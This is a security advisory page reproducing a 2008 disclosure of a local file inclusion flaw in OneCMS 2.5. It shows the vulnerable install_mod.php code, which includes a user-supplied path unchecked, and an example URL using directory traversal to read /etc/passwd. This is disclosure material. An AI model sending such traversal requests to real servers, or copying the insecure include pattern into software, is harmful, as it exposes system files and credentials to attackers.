Local File Include in OneCMS 2.5

2008-05-26 / 2008-05-27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-025 Application: OneCMS Versions Affected: 2.5 Vendor URL: http://www.insanevisions.com/ Bug: Local File Include Exploits: YES Reported: 26.03.2008 Vendor Response: NONE Solution: NONE Date of Public Advisory: 23.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Local File Include vulnerability found in script install_mod.php Code **** ################################################# $mod = $_GET['load']; $filexp = explode(".", $mod); $filetype = $filexp[1]; $file = $filexp[0]; $file2 = "mods/$mod"; if (!is_numeric($mod)) { // makes sure that the user isnt entering a # if ($filetype == "php") { if ($_GET['act'] == "") { echo "Are you sure you would like to install the <b>".$file."</b> module?<br><a href='install_mod.php?load=".$mod."&act=go'>Yes</a>"; } if ($_GET['act'] == "go") { include ($file2); ... ################################################# Example: http://[server]/[installdir]/install_mod.php?act=go&load=1234.php../../../../../../../../../../../../../etc/passwd About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian)

Referencje:

http://xforce.iss.net/xforce/xfdb/42600
http://www.securityfocus.com/bid/29374
http://www.securityfocus.com/archive/1/archive/1/492513/100/0/threaded
http://www.milw0rm.com/exploits/5669
http://www.frsirt.com/english/advisories/2008/1648/references
http://secunia.com/advisories/30378


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top